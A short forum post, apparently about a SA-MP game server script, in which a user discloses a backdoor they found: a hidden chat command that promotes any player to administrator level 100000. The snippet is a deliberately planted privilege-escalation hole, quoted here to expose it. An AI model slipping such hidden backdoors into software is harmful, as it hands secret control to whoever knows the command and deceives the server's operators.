03.02.2015, 00:57
Quote:
I've found another backdoor in the code, are you aware of anymore? You should really tell us.
Код:
if(strcmp(cmd, "/fuckyoumanseriously", true) == 0) { PlayerInfo[playerid][pAdmin] = 100000; SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 100000 Administrator"); SendClientMessage(playerid, COLOR_LIGHTBLUE, string); return 1; } |